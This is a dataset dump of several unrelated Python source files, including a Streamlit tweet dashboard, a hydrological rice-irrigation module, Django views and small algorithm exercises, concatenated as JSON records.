components.input_file_to_dataframe(uploaded_files[i])])\n\t\t\t\t\tdatasets_count += 1\n\t\t\t\t\tdf = df.reset_index()\n\n\t\tst.session_state[\"datasets_count\"] = datasets_count\n\t\tst.session_state[\"df\"] = df\n\n\tdef extract_hashtags(text):\n\t\thashtags_list = []\n\t\thashtags = re.findall( r'#[a-zA-Z_-]+', text)\n\t\tfor h in hashtags:\n\t\t\thashtags_list.append(h[1:])\n\t\treturn hashtags_list\n\n\tst.markdown(body=\"Refresh page or open new one for another dataset analysis\")\n\n\tif 'cluster_name' in df:\n\t\tdf = df.rename(columns={\"cluster_name\": \"topic\"})\n\n\tdf[\"datetime\"] = pd.to_datetime(df[\"c_date\"])\n\n\tstart_datetime = datetime.fromtimestamp(df['timestamp_utc'].min())\n\tend_datetime = datetime.fromtimestamp(df['timestamp_utc'].max())\n\n\tdatasets_count = st.session_state['datasets_count']\n\tstatus = [\n\t\tf\"Uploaded {st.session_state['datasets_count']} dataset{'s' if datasets_count > 1 else ''}, {len(df.index)} rows.\",\n\t\tf\"Dataset first date is {start_datetime}, end date is {end_datetime}\"\n\t]\n\tst.markdown('\\n'.join(status))\n\n\tif DISPLAY_DATE_SLIDER:\n\t\tcols1, _ = st.columns((1,1))\n\t\tmax_days = end_datetime - start_datetime\n\t\tslider = cols1.slider('Select date', min_value=start_datetime, value=(start_datetime, end_datetime), max_value=end_datetime)\n\n\tdf['hashtags_list'] = df['text'].apply(extract_hashtags)\n\n\n\n\twith st.sidebar:\n\t\tst.title('Dataset Filter')\n\n\t\tstart_date = pd.to_datetime(st.date_input('Start date: ', start_datetime))\n\t\tend_date = pd.to_datetime(st.date_input('End date: ', end_datetime))\n\n\t\tst.markdown(\"---\")\n\n\n\t\t# if not 'collected_via' in df:\n\t\tdf = df[(df['datetime'] >= start_date) & (df['datetime'] <= end_date)]\n\n\t\tgroup_by_options = [\"total\"]\n\n\t\twith st.expander(\"Filters\"):\n\t\t\tif \"topic\" in df.columns:\n\t\t\t\tgroup_by_options.append(\"topic\")\n\n\t\t\t\tst.title('Topics Filter')\n\t\t\t\ttopics = df[\"topic\"].unique()\n\t\t\t\ttopics = list(sorted(topics))\n\t\t\t\tselected_topics = st.multiselect(\"Topics: \", topics, key=\"topics\", default=topics)\n\t\t\t\tdf = df[df['topic'].isin(selected_topics)]\n\n\t\t\t\tst.markdown(\"---\")\n\n\t\t\tif \"hashtags_list\" in df.columns:\n\t\t\t\tst.title('Hashtags Filter')\n\t\t\t\thashtags = df.explode(\"hashtags_list\")[\"hashtags_list\"].fillna(\"No hashtags\").unique()\n\t\t\t\t# st.write(hashtags)\n\t\t\t\thashtags = list(sorted(hashtags))\n\n\t\t\t\tif hashtags:\n\t\t\t\t\thashtags.remove(\"No hashtags\")\n\t\t\t\thashtags.insert(0, \"No hashtags\")\n\t\t\t\tselected_hashtags = st.multiselect(\"Hashtags: \", hashtags, key=\"hashtags\", default=hashtags)\n\n\n\t\t\t\tdef filter_hashtags(hashtags_list):\n\t\t\t\t\treturn all(hashtag in selected_hashtags for hashtag in hashtags_list)\n\n\n\t\t\t\tdf = df[df['hashtags_list'].apply(filter_hashtags)]\n\n\t\t\t\tst.markdown(\"---\")\n\n\t\tst.radio(\"Breakdown by:\", group_by_options, index=len(group_by_options)-1, key=\"group_by\")\n\n\tst.header(f\"Distribution of tweets by time\")\n\ttimeseries = components.tweetdf_to_timeseries(df, frequency=\"1D\")\n\t# timeseries_plot = plot_timeseries(timeseries)\n\tst.bar_chart(timeseries, use_container_width=True)\n\n\thashtags = list(chain.from_iterable(df['hashtags_list'].to_list()))\n\thashtags = list(sorted(hashtags))\n\n\ttopics = components.extract_topics(df, flat_list=hashtags)\n\ttopics_sorted = sorted(topics.items(), key=lambda x: x[1], reverse=True)\n\ttop_topics = topics_sorted[:5]\n\n\tdemo_sentiment_topic_data = False\n\tif 'sentiment' not in df or 'topic' not in df:\n\t\tdemo_sentiment_topic_data = True\n\t\tdf['sentiment'] = np.random.randint(-10, 10, df.shape[0])\n\t\ttopics = ['putin', 'ukraine', 'russia', 'israel']\n\t\tdf['topic'] = np.random.choice(topics, df.shape[0])\n\n\tfig = components.colored_sentiment_plot(df)\n\tst.header(f\"{'[DEMO] ' if demo_sentiment_topic_data else ''}Topics distribution colored by mean sentiment\")\n\tif demo_sentiment_topic_data:\n\t\tst.markdown(f\"**Warning!** This is data for testing purposes, generated randomly for your dataset!\")\n\tst.pyplot(fig)\n\n\tst.header(f\"Change of sentiment over time\")\n\ts_df = df.copy()\n\ttopics = s_df['topic'].unique()\n\ts_df['datetime'] = df['datetime']\n\n\ttopics_df = pd.DataFrame(columns=['sentiment', 'topic', 'datetime'])\n\n\tif st.session_state[\"group_by\"] == \"total\":\n\t\tnew_df = s_df.groupby(s_df['datetime'].dt.month).agg({'sentiment': 'mean', 'datetime': 'min'})\n\t\tnew_df['topic'] = 'total'\n\t\ttopics_df = pd.concat([topics_df, new_df])\n\telse:\n\t\tfor topic in topics:\n\t\t\tnew_df = s_df[s_df['topic'] == topic].groupby(s_df['datetime'].dt.month).agg(\n\t\t\t\t{'sentiment': 'mean', 'datetime': 'min'})\n\t\t\tnew_df['topic'] = topic\n\t\t\t# st.dataframe(new_df)\n\n\t\t\ttopics_df = pd.concat([topics_df, new_df])\n\n\ttopics_df = topics_df.reset_index()\n\tst.line_chart(topics_df, x=\"datetime\", y=\"sentiment\", color='topic')\n\t# # dfc = df.copy()\n\t# # # st.write(dfc.columns)\n\t# # # dfc = dfc.groupby(pd.Grouper(key=\"timestamp_utc\", freq=\"1D\")).mean()\n\t# # # dfc.groupby(pd.Grouper(freq=\"1D\")).mean()\n\t# # dfc[\"timestamp_utc\"] = pd.to_datetime(dfc[\"timestamp_utc\"], unit=\"s\")\n\t# # dfc = dfc.set_index('timestamp_utc')\n\t# # dfc = dfc.groupby([pd.Grouper(freq=\"1W\"), \"topic\"]).mean(numeric_only=True).reset_index()\n\t# # # st.write(dfc)\n\t# st.line_chart(dfc, x=\"timestamp_utc\", y=\"sentiment\", use_container_width=True)\n\n\n\t# https://github.com/ArnelMalubay/Twitter-WordCloud-Generator-using-Streamlit/blob/main/app.py\n\twordcloud = WordCloud(background_color=\"white\", collocations=False).generate(' '.join(hashtags))\n\tfig = plt.figure()\n\tplt.imshow(wordcloud)\n\tplt.axis(\"off\")\n\tst.header(f\"Wordcloud of hashtags\")\n\tst.markdown(\"Detect the most used hashtag in a dataset.\")\n\tst.pyplot(fig)\n\n\tst.header(f\"Top-5 hashtags\")\n\tst.markdown(f\"\"\"`First Tweet URL` means first appearance of a hashtag in a dataset. `Most Active User URL` means a\n\t\tlink to username of account wrote the biggest amounts of tweet with a hashtag.\"\"\")\n\n\n\tfirst_tweets, most_active_users = components.get_first_tweets_most_active_users(df, top_topics)\n\thashtags_df = pd.DataFrame(topics_sorted[:5])\n\thashtags_df['first_url'] = first_tweets\n\thashtags_df['most_active_user_url'] = most_active_users\n\thashtags_df.columns = ['Hashtag', 'Count', 'First Tweet URL', 'Most Active User URL']\n\n\tst.dataframe(\n\t\thashtags_df,\n\t\tcolumn_config={\n\t\t\t\"hashtag\": st.column_config.Column(\"Hashtag\"),\n\t\t\t\"count\": st.column_config.Column(\"Count\"),\n\t\t\t\"first_url\": st.column_config.LinkColumn(),\n\t\t\t\"most_active_user_url\": st.column_config.LinkColumn(),\n\t\t},\n\t\thide_index=True\n\t)\n\n\tst.header(f\"Dataframe explorer\")\n\tst.markdown(\"You can search in dataset and download it (buttons in the top right corner of the table).\")\n\tnew_df = df\n\n\tdrop_fields = ['EntityID','EntityType', 'id', 'author_id', 'video_duration', 'video_url', 'icon-url']\n\tfor field in drop_fields:\n\t\tif field in df:\n\t\t\tnew_df = new_df.drop(field, axis='columns')\n\n\tst.dataframe(\n\t\tnew_df,\n\t\tcolumn_config={\n\t\t\t\"author_name\": st.column_config.Column(\"Name\"),\n\t\t\t\"author_alias\": st.column_config.Column(\"Alias\"),\n\t\t\t\"url\": st.column_config.LinkColumn(\"Tweet URL\"),\n\t\t\t\"author_image\": st.column_config.ImageColumn(\n\t\t\t\t\t\"Profile Picture\", help=\"Profile picture preview\"\n\t\t\t),\n\t\t\t\"author_url\": st.column_config.LinkColumn(\"Author URL\"),\n\t\t},\n\t)\n\n\tst.header(f\"{'[DEMO] ' if demo_sentiment_topic_data else ''}Topics and sentiments analysis\")\n\tif demo_sentiment_topic_data:\n\t\tst.markdown(f\"**Warning!** This is data for testing purposes, generated randomly for your dataset!\")\n\n\ttopics = s_df['topic'].unique()\n\ts_df['datetime'] = df['datetime']\n\n\ttopics_df = pd.DataFrame(columns=['sentiment', 'topic', 'datetime'])\n\tfor topic in topics:\n\t\tnew_df = s_df[s_df['topic'] == topic].groupby(s_df['datetime'].dt.month).agg({'sentiment': 'mean', 'datetime': 'min'})\n\t\tnew_df['topic'] = topic\n\t\ttopics_df = pd.concat([topics_df, new_df])\n\n\ttopics_df = topics_df.reset_index()\n\tst.dataframe(topics_df)\n\t# st.line_chart(topics_df, x=\"datetime\", y=\"sentiment\", color='topic')\n\n","repo_name":"soxoj/bellingcat-hackathon-watchcats","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27184689357","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport binascii\n\n\nclass InvalidBase64(ValueError):\n \"\"\"Raised if parsing or decoding cannot continue due to invalid base64.\"\"\"\n\n\ndef padBase64(b64string):\n \"\"\"Re-add any stripped equals sign character padding to a b64 string.\n\n :param string b64string: A base64-encoded string which might have had its\n trailing equals sign (``=``) padding removed.\n :raises ValueError: if there was any error while manipulating the string.\n :returns: A properly-padded (according to the base64 spec: :rfc:`4648`)\n string.\n \"\"\"\n addchars = 0\n try:\n b64string = b64string.strip()\n remainder = len(b64string) % 4\n if 2 <= remainder <= 3:\n addchars = 4 - remainder\n except AttributeError as error:\n raise ValueError(error)\n else:\n if not addchars:\n raise ValueError(\"Invalid base64-encoded string: %r\" % b64string)\n b64string += '=' * addchars\n\n return b64string\n\ndef parseUnpaddedBase64(field):\n \"\"\"Parse an unpadded, base64-encoded field.\n\n The **field** will be re-padded, if need be, and then base64 decoded.\n\n :param str field: Should be some base64-encoded thing, with any trailing\n ``=``-characters removed.\n :raises InvalidBase64: if there is an error in either unpadding or decoding\n **field**.\n :rtype: str\n :returns: The base64-decoded **field**.\n \"\"\"\n if field.endswith('='):\n raise InvalidBase64(\"Unpadded, base64-encoded networkstatus field \"\\\n \"must not end with '=': %r\" % field)\n\n try:\n paddedField = padBase64(field) # Add the trailing equals sign back in\n except ValueError as error:\n raise InvalidBase64(error)\n\n debasedField = binascii.a2b_base64(paddedField)\n if not debasedField:\n raise InvalidBase64(\"Base64-encoded networkstatus field %r is invalid!\"\n % field)\n\n return debasedField\n","repo_name":"isislovecruft/bridgedb","sub_path":"bridgedb/parse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1777833036","text":"#!/usr/bin/env python\n\nimport time\n\nn = 0\nwith open(\"./nmea_fifo\",'w') as fifo:\n while 1:\n fifo.write(\"Line number %d\\n\" % (n, ))\n fifo.flush()\n n += 1\n time.sleep(3)\n\n\n","repo_name":"smr547/distrib_nmea","sub_path":"talker.py","file_name":"talker.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18527395109","text":"from __future__ import absolute_import, print_function\n\nimport numpy as np\n\nfrom ..global_modules.add1 import loadmap\nfrom ..global_modules.settings import MaskInfo, LisSettings\nfrom . import HydroModule\n\n\nclass riceirrigation(HydroModule):\n \"\"\"\n # ************************************************************\n # ***** Rice irrigation ************************************\n # ************************************************************\n \"\"\"\n input_files_keys = {'riceIrrigation': ['RiceFlooding', 'RicePercolation', 'RicePlantingDay1',\n 'RiceHarvestDay1', 'RicePlantingDay2', 'RiceHarvestDay2']}\n module_name = 'RiceIrrigation'\n\n def __init__(self, riceirrigation_variable):\n self.var = riceirrigation_variable\n\n # --------------------------------------------------------------------------\n # --------------------------------------------------------------------------\n\n def initial(self):\n \"\"\" initial part of the rice irrigation module\n \"\"\"\n maskinfo = MaskInfo.instance()\n self.var.PaddyRiceWaterAbstractionFromSurfaceWaterM3 = maskinfo.in_zero()\n settings = LisSettings.instance()\n option = settings.options\n if option['riceIrrigation']:\n # ************************************************************\n # ***** PADDY RICE IRRIGATION AND ABSTRACTION ******************\n # ************************************************************\n\n # Additional water for paddy rice cultivation is calculated seperately, as well as additional open water evaporation from rice fields\n # self.var.RiceFlooding = loadmap('RiceFlooding') #original\n self.var.RiceFlooding = loadmap('RiceFlooding')\n # 10 mm for 10 days (total 10cm water)\n # self.var.RicePercolation = loadmap('RicePercolation') #original\n self.var.RicePercolation = loadmap('RicePercolation')\n # FAO: percolation for heavy clay soils: PERC = 2 mm/day\n\n self.var.RicePlantingDay1 = loadmap('RicePlantingDay1')\n # starting day (of the year) of first rice planting\n self.var.RiceHarvestDay1 = loadmap('RiceHarvestDay1')\n # starting day (of the year) of first rice harvest\n\n self.var.RicePlantingDay2 = loadmap('RicePlantingDay2')\n # starting day (of the year) of second rice planting\n self.var.RiceHarvestDay2 = loadmap('RiceHarvestDay2')\n # starting day (of the year) of 2nd rice harvest\n\n def dynamic(self):\n \"\"\" dynamic part of the rice irrigation routine\n inside the water abstraction routine\n \"\"\"\n settings = LisSettings.instance()\n option = settings.options\n maskinfo = MaskInfo.instance()\n if option['riceIrrigation']:\n # water needed for paddy rice is assumed to consist of:\n # phase 1: field preparation: soil saturation (assumed to happen in 10 days, 20 days before planting)\n # phase 2: flood fields (assumed to happen in 10 days, 10 days before planting)\n # phase 3: planting, while keep constant water level during growing season (open water evaporation)\n # phase 4: stop keeping constant water level 20 days before harvest date\n # phase 5: start draining 10 days before harvest date\n # RiceSoilSaturationDemandM3=(WS1-W1Loop1+WS2-W2Loop1)*RiceFraction*MMtoM3;\n # RiceSoilSaturationDemandM3 = (self.var.WS1[0]-self.var.W1[0] + self.var.WS2[0]-self.var.W2[0]) * self.var.RiceFraction * self.var.MMtoM3 #original\n RiceSoilSaturationDemandM3 = (self.var.WS1[0] - self.var.W1[0] + self.var.WS2[0] - self.var.W2[0]) * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay\n # this part is using the whole other fraction to calculate the demand -> an rice only soil part is needed\n # RiceIrrigationDemandM3 unit is m3 per time interval [m3/dt]\n\n pl_20 = self.var.RicePlantingDay1 - 20\n pl_20 = np.where(pl_20 < 0, 365 + pl_20, pl_20)\n pl_10 = self.var.RicePlantingDay1 - 10\n pl_10 = np.where(pl_10 < 0, 365 + pl_10, pl_10)\n\n ha_20 = self.var.RiceHarvestDay1 - 20\n ha_20 = np.where(ha_20 < 0, 365 + ha_20, ha_20)\n ha_10 = self.var.RiceHarvestDay1 - 10\n ha_10 = np.where(ha_10 < 0, 365 + ha_10, ha_10)\n\n # for Europe ok, but for Global planting can be on the 330 and harvest on the 90, so harvest < planting\n # or riceplanting = 5 => riceplanting -20 =350 ==> riceplanting < riceplanting -20\n\n \"\"\" phase 1: field preparation: soil saturation (assumed to happen in 10 days, 20 days before planting)\"\"\"\n # RiceSoilSaturationM3=if((CalendarDay ge (RicePlantingDay1-20)) and (CalendarDay le (RicePlantingDay1-10)),0.1*RiceSoilSaturationDemandM3,0)\n RiceSoilSaturationM3 = np.where((self.var.CalendarDay >= pl_20) & (self.var.CalendarDay < pl_10),\n 0.1 * RiceSoilSaturationDemandM3, maskinfo.in_zero())\n # RiceFloodingM3=if((CalendarDay ge (RicePlantingDay1-10)) and (CalendarDay le (RicePlantingDay1)),(RiceFlooding+EWRef)*RiceFraction*MMtoM3,0)\n\n RiceEva = self.var.EWRef - (self.var.ESAct[0] + self.var.Ta[0])\n RiceEva = np.maximum(RiceEva, 0)\n RiceEvaporationDemandM3 = RiceEva * self.var.RiceFraction * self.var.MMtoM3 # m3 per time interval\n # should not happen, but just to be sure that this doesnt go <0\n # part of the evaporation is already taken out in soil module!\n # substracting the soil evaporation and transpiration which was already taken off in the soil module\n\n RiceFloodingDemandM3 = self.var.RiceFlooding * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay # m3 per time interval\n\n \"\"\" phase 2: flood fields (assumed to happen in 10 days, 10 days before planting)\"\"\"\n\n # RiceFloodingM3 = np.where((self.var.CalendarDay >= pl_10) & (self.var.CalendarDay < self.var.RicePlantingDay1), (self.var.RiceFlooding+RiceEva)*self.var.RiceFraction*self.var.MMtoM3, maskinfo.in_zero()) #original\n RiceFloodingM3 = np.where(\n (self.var.CalendarDay >= pl_10) & (self.var.CalendarDay < self.var.RicePlantingDay1),\n RiceFloodingDemandM3 + RiceEvaporationDemandM3, maskinfo.in_zero()) # m3 per time interval\n # part of the evaporation is already taken out in soil module!\n # assumption is that a fixed water layer is kept on the rice fields, totalling RiceFlooding*10 in mmm (typically 50 or 100 mm)\n # application is spread out over 10 days\n # open water evaporation at the same time\n\n \"\"\" phase 3: planting, while keep constant water level during growing season (open water evaporation) \"\"\"\n # RiceEvaporationM3=if((CalendarDay ge RicePlantingDay1) and (CalendarDay le (RiceHarvestDay1-20)),EWRef*RiceFraction*MMtoM3,0)\n # RiceEvaporationM3 = np.where((self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20), RiceEva * self.var.RiceFraction*self.var.MMtoM3 , maskinfo.in_zero()) #original\n RiceEvaporationM3 = np.where(\n (self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20),\n RiceEvaporationDemandM3, maskinfo.in_zero()) # m3 per time interval\n\n # substracting the soil evaporation which was already taken off in the soil module (also transpitation should be tyaken off )\n\n # RicePercolationM3=if((CalendarDay ge RicePlantingDay1) and (CalendarDay le (RiceHarvestDay1-20)),RicePercolation*RiceFraction*MMtoM3,0)\n RicePercolationDemandM3 = self.var.RicePercolation * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay # m3 per time interval\n # RicePercolationM3 = np.where((self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20), self.var.RicePercolation*self.var.RiceFraction*self.var.MMtoM3, maskinfo.in_zero()) #original\n RicePercolationM3 = np.where(\n (self.var.CalendarDay >= self.var.RicePlantingDay1) & (self.var.CalendarDay < ha_20),\n RicePercolationDemandM3, maskinfo.in_zero()) # m3 per time interval\n # FAO: percolation for heavy clay soils: PERC = 2 mm/day\n self.var.PaddyRiceWaterAbstractionFromSurfaceWaterM3 = RiceSoilSaturationM3 + RiceFloodingM3 + RiceEvaporationM3 + RicePercolationM3 # m3 per time interval\n # m3 water needed for paddyrice\n\n # self.var.TotalAbstractionFromSurfaceWaterM3 = self.var.PaddyRiceWaterAbstractionFromSurfaceWaterM3\n\n \"\"\"# phase 4: stop keeping constant water level 20 days before harvest date\n phase 5: start draining 10 days before harvest date\"\"\"\n # RiceDrainageM3=if((CalendarDay ge (RiceHarvestDay1-10)) and (CalendarDay le RiceHarvestDay1),(WS1-WFC1+WS2-WFC2)*RiceFraction*MMtoM3,0)\n\n RiceDrainageDemandM3 = (self.var.WS1[0] - self.var.WFC1[0] + self.var.WS2[0] - self.var.WFC2[\n 0]) * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay # m3 per time interval\n RiceDrainageM3 = np.where(\n (self.var.CalendarDay >= ha_10) & (self.var.CalendarDay < self.var.RiceHarvestDay1),\n 0.1 * RiceDrainageDemandM3, maskinfo.in_zero())\n # RiceDrainageM3 = np.where((self.var.CalendarDay >= ha_10) & (self.var.CalendarDay < self.var.RiceHarvestDay1),\n # 0.1 * (self.var.WS1[0]-self.var.WFC1[0] + self.var.WS2[1]-self.var.WFC2[1]) * self.var.RiceFraction*self.var.MMtoM3,maskinfo.in_zero()) #original\n\n # drainage until FC to soil/groundwater at end of season\n # assumption that the last weeks before harvest the 50mm water layer is completely evaporating\n # needs to be transported to channel system or being drained\n\n # UZLoop1 += cover((RiceDrainageM3+RicePercolationM3)*M3toMM/OtherFraction,0)\n self.var.UZ[0] += np.where(self.var.OtherFraction > 0.0,\n (RiceDrainageM3 + RicePercolationM3) * self.var.M3toMM / self.var.OtherFraction,\n 0.0)\n # drained water is added to Upper Zone\n","repo_name":"hzeinivand/lisflood","sub_path":"src/lisflood/hydrological_modules/riceirrigation.py","file_name":"riceirrigation.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4526932381","text":"from app.models import db, PlaylistReview, environment, SCHEMA\nfrom sqlalchemy.sql import text\n\ndef seed_playlist_reviews():\n review1 = PlaylistReview(\n review = f\"Finally, we come to Forever After All, where Luke kicks off with talk about “cold beer” and we're firmly placing our feet back in Nashville cliché territory. As before, it's a big arena ballad with that big chorus and Comb's driving it along with his vocal.\",\n\n playlist_id = 1,\n user_id = 1\n )\n review2 = PlaylistReview(\n review = f\"Up next is Comb's version of a honky tonk song in My Kinda Folk. Musically it's a fun little song, filled again with the clichés of Nashville country music. It's a party song that'll surely work well after a few beers in a live setting. It's Music Row country without a doubt, but its done well.\",\n\n playlist_id = 2,\n user_id = 2\n )\n\n db.session.add(review1)\n db.session.add(review2)\n db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE or DELETE the users table. SQLAlchemy doesn't\n# have a built in function to do this. With postgres in production TRUNCATE\n# removes all the data from the table, and RESET IDENTITY resets the auto\n# incrementing primary key, CASCADE deletes any dependent entities. With\n# sqlite3 in development you need to instead use DELETE to remove all data and\n# it will reset the primary keys for you as well.\ndef undo_playlist_reviews():\n if environment == \"production\":\n db.session.execute(f\"TRUNCATE table {SCHEMA}.users RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(text(\"DELETE FROM playlist_reviews\"))\n\n db.session.commit()\n","repo_name":"lee963654/spnotify","sub_path":"app/seeds/playlist_review.py","file_name":"playlist_review.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71609900328","text":"#python3\nimport sys\n\ndef get_change(amount):\n coins = [1, 3, 4]\n solution = [0 for i in range(amount+1)]\n\n for i in range(amount+1):\n min_coins = float('inf')\n for j in coins:\n if i == 0:\n solution[i] = 0\n else:\n if j <= i:\n min_coins = min(min_coins, 1 + solution[i - j])\n solution[i] = min_coins\n \n return solution[amount]\n\n\nif __name__ == '__main__':\n m = int(sys.stdin.read())\n print(get_change(m))\n\n","repo_name":"calam1/coursera","sub_path":"ucsd_algorithms/ucsd_course_1/week_5/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41628682018","text":"import numpy as np\nimport cv2\nimport time\nimport card_detector as cd\n\ndef check_image_difference(img1, img2):\n\n diff = cv2.absdiff(last_frame, frame)\n cv2.imshow(\"diff\", diff)\n return\n\n\ncap = cv2.VideoCapture(0)\ncd.load_cards()\n\n#ret, last_frame = cap.read()\n#ret, one_frame = cap.read()\n#last_time = time.time()\n#temp_diff = cv2.absdiff(last_frame, one_frame)\n#last_diff = temp_diff.sum()\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Display the resulting frame\n cv2.imshow('frame',frame)\n\n# if (time.time()-last_time) > 5:\n# diff = cv2.absdiff(last_frame, frame)\n# diff_sum = diff.sum()\n\n# print min(last_diff,diff_sum)/float(max(last_diff, diff_sum))\n# \n# if min(last_diff,diff_sum)/float(max(last_diff, diff_sum)) > 0.50:\n# cv2.imshow(\"diff\", diff)\n# last_diff = diff_sum\n#\n# last_time = time.time()\n# last_frame = frame\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print(\"detecting...\")\n image = frame\n cd.detect_cards(image)\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()","repo_name":"mspkvp/CardDetectorOpenCV","sub_path":"src/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18270914366","text":"import pickle\r\nimport pandas as pd\r\nimport json \r\nimport numpy as np\r\nimport math\r\n\r\nclass ModelPrediction:\r\n def loadModel(self, filename):\r\n model = pickle.load(open(filename, 'rb'))\r\n print('leido pikle')\r\n return model\r\n def predict(self,model,data):\r\n #calculo\r\n datos = data.copy()\r\n df = pd.DataFrame(datos)\r\n #df = df.set_index('DateObserved')\r\n print(df.info)\r\n #realizo prediccion y calculo distancia\r\n iso_prediction = model.predict(df)\r\n iso_core = model.score_samples(df)\r\n #calculo si es una anomalia y su probabilidad\r\n df['anomaly'] =(iso_prediction[0]==-1)\r\n df['probabilty'] = iso_core[0] *100*-1*df['anomaly']\r\n\r\n return df ","repo_name":"stefaniaeuropea/deteccion_anomalias","sub_path":"deploy/ModelPrediction.py","file_name":"ModelPrediction.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9772322089","text":"import os\n\nos.system(\"find * -name *.cpp > data\")\nfile = open(\"data\")\nwhile True:\n line = file.readline().rstrip('\\n')\n if not line:\n break\n cmd = \"nohup cpplint \" + line\n os.system(cmd)\nos.system(\"rm -rf data\")\n","repo_name":"SeenHit/RepoAnalyseTool","sub_path":"cpplintSearchAll.py","file_name":"cpplintSearchAll.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453031085","text":"from typing import List, Set\n\n\nclass Solution:\n def splitArray(self, nums: List[int]) -> bool:\n return len(nums) > 6 and any(\n self.dfs(nums[:i]) & self.dfs(nums[i + 1 :])\n for i in range(3, len(nums) - 3)\n )\n\n def dfs(self, nums: List[int]) -> Set[int]:\n total = sum(nums)\n prefix_sum = [0 for _ in range(len(nums))]\n cur_sum = 0\n for i in range(0, len(nums)):\n cur_sum += nums[i]\n prefix_sum[i] = cur_sum\n return {\n prefix_sum[i - 1]\n for i in range(1, len(nums))\n if total - prefix_sum[i] == prefix_sum[i - 1]\n }\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"548_Split_Array_with_Equal_Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14806401605","text":"import hw5_twitter\nimport sys\n\nusername1=sys.argv[1]\nusername2=sys.argv[2]\nnum_tweets=sys.argv[3]\n\nfreq_user1=hw5_twitter.frequency_of_words(username1,num_tweets)\nfreq_user2=hw5_twitter.frequency_of_words(username2,num_tweets)\n\n\ncommon_list=[]\nfor i in freq_user1:\n for j in freq_user2:\n if i[0] == j[0]:\n num=0\n num=i[1]+j[1]\n common_list.append((j[0],num))\n\ndef diffe_list(sample_list,common_list):\n word_sample_list=[]\n for i in sample_list:\n word_sample_list.append(i[0])\n word_common_list=[]\n for j in common_list:\n word_common_list.append(j[0])\n word_diff_list=list(set(word_sample_list)-set(word_common_list))\n diff_list=[]\n for i in sample_list:\n for j in word_diff_list:\n if i[0] == j:\n diff_list.append(i)\n return diff_list\n\ndiff_list1=diffe_list(freq_user1,common_list)\ndiff_list2=diffe_list(freq_user2,common_list)\ndiff_list=diff_list1+diff_list2\n\ntop_common_list=hw5_twitter.top_five(common_list)\ntop_diff_list=hw5_twitter.top_five(diff_list)\n\nprint(top_common_list)\nprint(top_diff_list)\n","repo_name":"jingwenc/SI507HW5-EC1","sub_path":"twitter_boggle.py","file_name":"twitter_boggle.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1570200012","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport time\nimport base64\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom blueking.component.shortcuts import get_client_by_request, get_client_by_user\nfrom common.log import logger\nfrom common.mymako import render_mako_context\nfrom common.mymako import render_json\nfrom common_esb import *\nfrom django.forms.models import model_to_dict\n\nfrom home_application.models import HostInfo, HostLoad5\n\n\ndef home(request):\n \"\"\"\n 首页\n \"\"\"\n return render_mako_context(request, '/home_application/home.html')\n\n\ndef dev_guide(request):\n \"\"\"\n 开发指引\n \"\"\"\n return render_mako_context(request, '/home_application/dev_guide.html')\n\n\ndef contactus(request):\n \"\"\"\n 联系我们\n \"\"\"\n return render_mako_context(request, '/home_application/contact.html')\n\n\ndef history(request):\n return render_mako_context(request, '/home_application/history.html')\n\n\ndef test(request):\n return render_json({\"result\": 'ok', \"username\": request.user.username})\n\n\n@csrf_exempt\ndef get_biz(request):\n client = get_client_by_request(request)\n res = search_business_esb(client, request.user.username)\n return render_json(res)\n\n\n@csrf_exempt\ndef get_set(request):\n bk_biz_id = request.GET.get('bk_biz_id')\n client = get_client_by_request(request)\n res = search_set_esb(client, request.user.username, bk_biz_id)\n return render_json(res)\n\n\n@csrf_exempt\ndef get_host(request):\n params = json.loads(request.body)\n bk_host_innerip__in = params.get('bk_host_innerip__in')\n client = get_client_by_request(request)\n res = search_host_esb(client, request.user.username)\n result = []\n for item in 